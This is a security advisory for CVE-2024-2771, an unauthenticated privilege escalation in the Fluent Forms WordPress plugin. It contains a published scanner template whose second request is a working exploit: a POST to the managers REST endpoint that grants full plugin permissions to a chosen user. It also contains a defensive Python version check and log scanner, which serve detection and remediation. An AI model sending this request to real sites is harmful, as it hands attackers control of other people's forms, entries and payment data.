The plugin is vulnerable to privilege escalation due to a missing capability check on the /wp-json/fluentform/v1/managers REST API endpoint. This makes it possible for unauthenticated attackers to grant Fluent Form management permissions to users, which gives those users access to all of the plugin's settings and features. It also makes it possible for unauthenticated attackers to delete manager accounts.
PoC code [published]
```yaml
id: CVE-2024-2771

info:
  name: Contact Form Plugin by Fluent Forms < 5.1.17 - Unauthenticated Limited Privilege Escalation
  author: Sourabh-Sahu
  severity: critical
  description: |
    The plugin is vulnerable to privilege escalation due to a missing capability check on the /wp-json/fluentform/v1/managers REST API endpoint. This makes it possible for unauthenticated attackers to grant users with Fluent Form management permissions which gives them access to all of the plugin's settings and features. This also makes it possible for unauthenticated attackers to delete manager accounts.
  remediation: update to 5.1.17 or later.
  reference:
    - https://github.com/whale93/CVE-2024-2771-PoC
    - https://nvd.nist.gov/vuln/detail/CVE-2024-2771
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/071195d6-3452-4241-a8d3-92efc84e4850?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-2771
    cwe-id: CWE-862
    epss-score: 0.24379
    epss-percentile: 0.95914
    cpe: cpe:2.3:a:fluentforms:contact_form:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/wp-content/plugins/fluentform/"
    vendor: fluentforms
    product: contact_form
    framework: wordpress
  tags: cve,cve2024,wordpress,fluentforms,wp-plugin,unauth,wp,vkev

flow: http(1) || http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/fluentform/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - compare_versions(version, '< 5.1.17')
        condition: and

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        POST /wp-json/fluentform/v1/managers HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept-Encoding: gzip, deflate, br

        {
          "manager": {
            "email": "{{email}}",
            "permissions": [
              "fluentform_dashboard_access",
              "fluentform_forms_manager",
              "fluentform_entries_viewer",
              "fluentform_manage_entries",
              "fluentform_view_payments",
              "fluentform_manage_payments",
              "fluentform_settings_manager",
              "fluentform_full_access"
            ]
          }
        }

    # exploit requires an existing user email address to work.
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, 'Manager has been saved.','{{email}}')"
          - "contains(content_type, 'application/json')"
        condition: and
# digest: 4a0a004730450220319f020d175719bb9e83dbf191e5a1c4dff678d2111bd1fde975612c8d14479a02210083c26db77693956fd27b40393ac845d29bf5e6018c469ac92f5efc7c2b01abd2:922c64590222798bb761d5b6d8e72950
```
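A defender-side check, added here as an example and not part of the template or the Fluent Forms project: it reproduces the template's version test (Stable tag below 5.1.17) in Python, handling uneven version lengths, and scans constructed access-log lines for state-changing requests under the managers endpoint so an administrator can review who was added as a manager. The readme text and log lines are constructed sample data; the hosts are not real.

```python
import re
from typing import List, Optional, Tuple

# Values taken from the advisory above.
FIXED_VERSION = "5.1.17"
MANAGERS_ENDPOINT = "/wp-json/fluentform/v1/managers"
STABLE_TAG_RE = re.compile(r"Stable tag:\s*([0-9.]+)")

def parse_version(v: str) -> Tuple[int, ...]:
    """'5.1.16' -> (5, 1, 16); trailing zeros dropped so 5.2 equals 5.2.0."""
    parts = tuple(int(p) for p in v.strip(".").split(".") if p)
    while len(parts) > 1 and parts[-1] == 0:
        parts = parts[:-1]
    return parts

def installed_version(readme_text: str) -> Optional[str]:
    """Pull the 'Stable tag' out of a plugin readme.txt, as the template's extractor does."""
    m = STABLE_TAG_RE.search(readme_text)
    return m.group(1) if m else None

def is_vulnerable(readme_text: str) -> Optional[bool]:
    """True if the reported version is below 5.1.17, None if no version is found."""
    v = installed_version(readme_text)
    if v is None:
        return None
    return parse_version(v) < parse_version(FIXED_VERSION)

def suspicious_manager_requests(log_lines: List[str]) -> List[str]:
    """State-changing requests under the managers endpoint (the delete route's exact
    path is not given in the advisory, so anything under the prefix is flagged)."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(POST|PUT|DELETE)\s+(\S+)', line)
        if m and m.group(2).split("?", 1)[0].startswith(MANAGERS_ENDPOINT):
            hits.append(line)
    return hits

# Constructed sample data: one readme.txt body and three combined-format log lines.
SAMPLE_README = "=== Fluent Forms ===\nRequires PHP: 7.0\nStable tag: 5.1.16\n"
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Apr/2024:10:00:01 +0000] "GET /wp-content/plugins/fluentform/readme.txt HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Apr/2024:10:00:02 +0000] "POST /wp-json/fluentform/v1/managers HTTP/1.1" 200 94',
    '198.51.100.7 - - [01/Apr/2024:10:03:11 +0000] "GET /wp-login.php HTTP/1.1" 200 3021',
]

if __name__ == "__main__":
    print("vulnerable:", is_vulnerable(SAMPLE_README))
    for hit in suspicious_manager_requests(SAMPLE_LOG):
        print("review:", hit)
```

A site on a vulnerable version should also be audited for manager entries it did not create, since the fix alone does not undo permissions already granted.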